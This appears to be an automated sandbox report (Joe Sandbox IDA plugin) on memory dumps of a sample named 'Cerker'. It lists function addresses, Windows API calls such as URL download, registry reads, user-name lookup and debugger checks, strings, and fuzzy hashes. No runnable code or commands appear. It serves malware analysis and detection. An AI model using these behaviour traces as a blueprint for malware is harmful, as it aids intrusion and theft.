fyyq9, xrefs: 008DA1D1
wytpj:, xrefs: 008D98B1
XSZ]A_;, xrefs: 008DD56B
7<=<I, xrefs: 008DBCE1
@FSYM_;, xrefs: 008DDDE1
z}7, xrefs: 008DCEC4
dszm9, xrefs: 008D9031
ctx`9, xrefs: 008D9471

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID: 7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
API String ID: 0-1094075928
Opcode ID: b9a5b8a4e6ad0ffdb8d875f9a07bf7da0344cdf57540ad644f93d151688df3b6
Instruction ID: 6a55795b63d82083789b71d60034cadb5b4d3e4b0fca4021e61f6855856ec588
Opcode Fuzzy Hash: b9a5b8a4e6ad0ffdb8d875f9a07bf7da0344cdf57540ad644f93d151688df3b6
Instruction Fuzzy Hash: BBA3C775D116594AEB06DB78CC41AE9F7B8FF66340F10D36AE404B6662FB30A6C6CB40

Function 008E5760 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,008E575F,00000001,00000000,?,00000001,?,008EBEE5), ref: 008E5782
TerminateProcess.KERNEL32(00000000,?,008E575F,00000001,00000000,?,00000001,?,008EBEE5), ref: 008E5789
ExitProcess.KERNEL32 ref: 008E579B

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b0abc6e983f5e188565e40e8efa50329d01922bfd62f070a3dc412b3ee139319
Instruction ID: c620b83ac5ec172028b7565add77056709b3e0ce4a875fef4f1cfd222c92dace
Opcode Fuzzy Hash: b0abc6e983f5e188565e40e8efa50329d01922bfd62f070a3dc412b3ee139319
Instruction Fuzzy Hash: DBE0B631000A88EFCF126F6ADC49D697B6AFB42745F108424FA05C6132DB35DD92CB91

Function 008F9F0F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008F9BC8: CreateFileW.KERNELBASE(00000000,00000000,?,008F9FB8,?,?,00000000,?,008F9FB8,00000000,0000000C), ref: 008F9BE5

GetLastError.KERNEL32 ref: 008FA023
__dosmaperr.LIBCMT ref: 008FA02A
GetFileType.KERNEL32(00000000), ref: 008FA036
GetLastError.KERNEL32 ref: 008FA040
__dosmaperr.LIBCMT ref: 008FA049
CloseHandle.KERNEL32(00000000), ref: 008FA069
CloseHandle.KERNEL32(008F18C6), ref: 008FA1B6
GetLastError.KERNEL32 ref: 008FA1E8
__dosmaperr.LIBCMT ref: 008FA1EF

Strings

H, xrefs: 008FA174

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ff9335556ac7d0fd15f793d2031c17427a9be54f1c1689b1e448c7d00ca71219
Instruction ID: e4c92138d4abda4a67d5bc6ccad6057bacc098fb2d0beeb6b8385fa16f183dfe
Opcode Fuzzy Hash: ff9335556ac7d0fd15f793d2031c17427a9be54f1c1689b1e448c7d00ca71219
Instruction Fuzzy Hash: 55A14472A142488FCF1D9F78DC91BBE3BA1FB4B320F240159E916EB291CB359916C752

Function 008EC204 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 008EC25B
ext-ms-, xrefs: 008EC26F

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 84fc4a3c70ef68dd37ff42fdc7f34ec17cee9247f24168b549318547f8994e75
Instruction ID: 8c438afb29fde2fd9eb9ffdb725659e6163f8165410a7117bfbfcec992a5fc49
Opcode Fuzzy Hash: 84fc4a3c70ef68dd37ff42fdc7f34ec17cee9247f24168b549318547f8994e75
Instruction Fuzzy Hash: 33219672E05265ABCB2247B69C45A2A7759FF43764F250121EF15E7290D630DD02D6E0

Function 008C9390 Relevance: 6.1, APIs: 4, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 008C93B9
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 008C93E8
RegCloseKey.ADVAPI32(?), ref: 008C93F5
RegCloseKey.KERNELBASE(?), ref: 008C9416

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 54be2370e7a1dd11d76401b330f60e2df198faa3191a4580a181158f8f8c257a
Instruction ID: e61782e27d1a1509e80c6e77847e6bc02b856c1543c8fb39ad3d2478113814af
Opcode Fuzzy Hash: 54be2370e7a1dd11d76401b330f60e2df198faa3191a4580a181158f8f8c257a
Instruction Fuzzy Hash: 95214975200309AFEB24DF28D848FBA77B9FB45704F00459CE9458B291DBB1E959CBA1

Function 008D3DA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 008D3DB6

Strings

A, xrefs: 008D3DAA

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: NameUser
String ID: A
API String ID: 2645101109-3554254475
Opcode ID: f6ec6f4203d2bd9556f3866d9072e0611e58ea4addbffa45cb5b23311a43ff1b
Instruction ID: 1a915479cae18bf148913d31ee320a905576f6f21e3d411d2d5db25999ab558e
Opcode Fuzzy Hash: f6ec6f4203d2bd9556f3866d9072e0611e58ea4addbffa45cb5b23311a43ff1b
Instruction Fuzzy Hash: CD3125759047458BEB06CF38D4016A5BBB9FF12384F00835EE951B3662EB31A74AD780

Function 008EC2CB Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed946e52bcd25310131bf456775a5dde67da59a0c26f15675a69cca2f71fdcb3
Instruction ID: 7edeb2e4651b75482ae011a630fcbe5c68cea689f18dacf9e2a66581d5e42908
Opcode Fuzzy Hash: ed946e52bcd25310131bf456775a5dde67da59a0c26f15675a69cca2f71fdcb3
Instruction Fuzzy Hash: 9F01F533E182659FDB118EAFEC41A5A33E7FB863247248524FA11CB254DA30D8029650

Function 008F1887 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 008F18C1

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 3863f5f09d69b503e394c8cd338e20f17da527c35b477c87695c49d03b4d0860
Instruction ID: 7df115eb4f3d336acc8d855dbdc8c7e1dda30da0b9265c3977f404189492326f
Opcode Fuzzy Hash: 3863f5f09d69b503e394c8cd338e20f17da527c35b477c87695c49d03b4d0860
Instruction Fuzzy Hash: B8111571A0420EAFCF05DF68E94599A7BF4FF48304F054069F919EB251D670EA11CBA5

Function 008F9E81 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 008F9EE4

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
Instruction ID: 095b023768a31a7237948f3e01b342ece6189df423f60125b01d6e1b0815108d
Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
Instruction Fuzzy Hash: 5501DA72D0415DAFCF42AFA98C01AEE7FB5FB08310F144165FA54E2161EA718A609B91

Function 008F9BC8 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,008F9FB8,?,?,00000000,?,008F9FB8,00000000,0000000C), ref: 008F9BE5

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6798ef2847aabf1899f72c2cce8de04fa14e390f91adbcb37d70593dddc0a9c3
Instruction ID: 58d02c5e4e4053eb8935cd51769cee58f94de7d30d12b9cc1c09b4d80cdf8fe5
Opcode Fuzzy Hash: 6798ef2847aabf1899f72c2cce8de04fa14e390f91adbcb37d70593dddc0a9c3
Instruction Fuzzy Hash: 58D06C3200024DBBDF028F84DC06EDA3BAAFB88714F014000BE1856020C732E862EB90

Non-executed Functions

Function 008F6D2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,008F704B,00000002,00000000,?,?,?,008F704B,?,00000000), ref: 008F6DC6
GetLocaleInfoW.KERNEL32(?,20001004,008F704B,00000002,00000000,?,?,?,008F704B,?,00000000), ref: 008F6DEF
GetACP.KERNEL32(?,?,008F704B,?,00000000), ref: 008F6E04

Strings

OCP, xrefs: 008F6D81
ACP, xrefs: 008F6D4B

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec494493f065e75c6740bfb68c2feb67cf13740f5e984b5d73eca0efc15d1ade
Instruction ID: 63f631e4d91d871117489d1f02f830731816897b7013be5087c29f33f4f911bc
Opcode Fuzzy Hash: ec494493f065e75c6740bfb68c2feb67cf13740f5e984b5d73eca0efc15d1ade
Instruction Fuzzy Hash: 7021742670010DAADB34AF34C900AB776B6FF50B64B668624EB0AD7115F733DD51C390

Function 008F6F02 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008EBBF0: GetLastError.KERNEL32(008C1920,00000001,008C1924,008E5E6D,00000001,00000000,00000000,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBBF5
Part of subcall function 008EBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBC93

Part of subcall function 008EBBF0: _free.LIBCMT ref: 008EBC52
Part of subcall function 008EBBF0: _free.LIBCMT ref: 008EBC88

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 008F700E
IsValidCodePage.KERNEL32(00000000), ref: 008F7057
IsValidLocale.KERNEL32(?,00000001), ref: 008F7066
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 008F70AE
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 008F70CD

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: bf16154c734c4691dcb3f3fac84a40e47145563a6c5399017886d0470ef4d2e9
Instruction ID: 6e3b0acc5f86c2e55853909d8f9957303c82721c6d0fe32c7aa195c1078eacd8
Opcode Fuzzy Hash: bf16154c734c4691dcb3f3fac84a40e47145563a6c5399017886d0470ef4d2e9
Instruction Fuzzy Hash: 30515072A0460EAFEF10DFB5DC45ABAB7B8FF44700F144569E604E7151EB709A50CB61

Function 008E0594 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008E05A0
IsDebuggerPresent.KERNEL32 ref: 008E066C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008E068C
UnhandledExceptionFilter.KERNEL32(?), ref: 008E0696

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 14bbfb0331d3a472e03dc690c33f16dd0d6517543db955c3e4cc5df6d30b07e2
Instruction ID: 5de39b73b08619a801731f0283015023243fd8fa386d2b658383c62bfa224754
Opcode Fuzzy Hash: 14bbfb0331d3a472e03dc690c33f16dd0d6517543db955c3e4cc5df6d30b07e2
Instruction Fuzzy Hash: 92310775D053589BDB11EFA5D989BCDBBB8FF08300F1041AAE54DAB250EB719A84CF05

Function 008DF8E2 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008DF8E8
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008DF8F6
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008DF907
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008DF918
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008DF929
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008DF93A
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 008DF94B
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008DF95C
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 008DF96D
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008DF97E
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008DF98F
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008DF9A0
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008DF9B1
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008DF9C2
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008DF9D3
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008DF9E4
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008DF9F5
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 008DFA06
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 008DFA17
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 008DFA28
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 008DFA39
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 008DFA4A
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 008DFA5B
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 008DFA6C
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 008DFA7D
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 008DFA8E
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008DFA9F
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 008DFAB0
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008DFAC1
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008DFAD2
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 008DFAE3
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 008DFAF4
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 008DFB05
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 008DFB16
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 008DFB27
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 008DFB38
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 008DFB49
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 008DFB5A
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 008DFB6B
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 008DFB7C
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 008DFB8D

Strings

InitializeConditionVariable, xrefs: 008DFA94
TryAcquireSRWLockExclusive, xrefs: 008DFAFA
SubmitThreadpoolWork, xrefs: 008DFB3E
GetSystemTimePreciseAsFileTime, xrefs: 008DFA83
CreateThreadpoolTimer, xrefs: 008DF984
CreateThreadpoolWait, xrefs: 008DF9C8
ReleaseSRWLockExclusive, xrefs: 008DFB0B
WakeAllConditionVariable, xrefs: 008DFAB6
GetCurrentPackageId, xrefs: 008DFA3F
kernel32.dll, xrefs: 008DF8E3
GetTickCount64, xrefs: 008DFA50
FlsFree, xrefs: 008DF8FC
FreeLibraryWhenCallbackReturns, xrefs: 008DFA0C
CompareStringEx, xrefs: 008DFB60
LCMapStringEx, xrefs: 008DFB82
SleepConditionVariableSRW, xrefs: 008DFB1C
WakeConditionVariable, xrefs: 008DFAA5
CreateSymbolicLinkW, xrefs: 008DFA33
GetLocaleInfoEx, xrefs: 008DFB71
InitializeCriticalSectionEx, xrefs: 008DF92F
GetCurrentProcessorNumber, xrefs: 008DFA1D
GetFileInformationByHandleEx, xrefs: 008DFA61
FlsGetValue, xrefs: 008DF90D
SetFileInformationByHandle, xrefs: 008DFA72
CreateSemaphoreExW, xrefs: 008DF973
CreateThreadpoolWork, xrefs: 008DFB2D
WaitForThreadpoolTimerCallbacks, xrefs: 008DF9A6
CloseThreadpoolTimer, xrefs: 008DF9B7
FlsSetValue, xrefs: 008DF91E
FlsAlloc, xrefs: 008DF8F0
CloseThreadpoolWork, xrefs: 008DFB4F
CreateEventExW, xrefs: 008DF951
CreateSemaphoreW, xrefs: 008DF962
SetThreadpoolTimer, xrefs: 008DF995
SetThreadpoolWait, xrefs: 008DF9D9
InitOnceExecuteOnce, xrefs: 008DF940
SleepConditionVariableCS, xrefs: 008DFAC7
InitializeSRWLock, xrefs: 008DFAD8
CloseThreadpoolWait, xrefs: 008DF9EA
AcquireSRWLockExclusive, xrefs: 008DFAE9
FlushProcessWriteBuffers, xrefs: 008DF9FB

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 363236656063e1a782399c8e9a144231f8e478fa7a3f05f195ce24d3938c6993
Instruction ID: ca560e3ae7fea95883a0ea6437bbf59edddb482c28f8b3976c0bad6a9fef684b
Opcode Fuzzy Hash: 363236656063e1a782399c8e9a144231f8e478fa7a3f05f195ce24d3938c6993
Instruction Fuzzy Hash: B0618672DA6724EFC7106FB4AE1DC663AE9FE6D7027000436B311D2662DBB8D102DB65

Function 008C29C0 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 311networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C2BA1
InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 008C2C1D
InternetCloseHandle.WININET(00000000), ref: 008C2C2A
InternetCloseHandle.WININET(00000000), ref: 008C2C98
InternetCloseHandle.WININET(00000000), ref: 008C2C9B
InternetReadFile.WININET(00000000,?,00002000,?), ref: 008C2CC7
InternetReadFile.WININET(00000000,?,00002000,?), ref: 008C2CFE
InternetCloseHandle.WININET(00000000), ref: 008C2D52
InternetCloseHandle.WININET(00000000), ref: 008C2D55

Strings

ios_base::badbit set, xrefs: 008C2D76, 008C2D9E
ios_base::failbit set, xrefs: 008C2D7F
""~|fP, xrefs: 008C2A04
sHM, xrefs: 008C2B30
33333333, xrefs: 008C2A93, 008C2AFF
ios_base::eofbit set, xrefs: 008C2D84

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

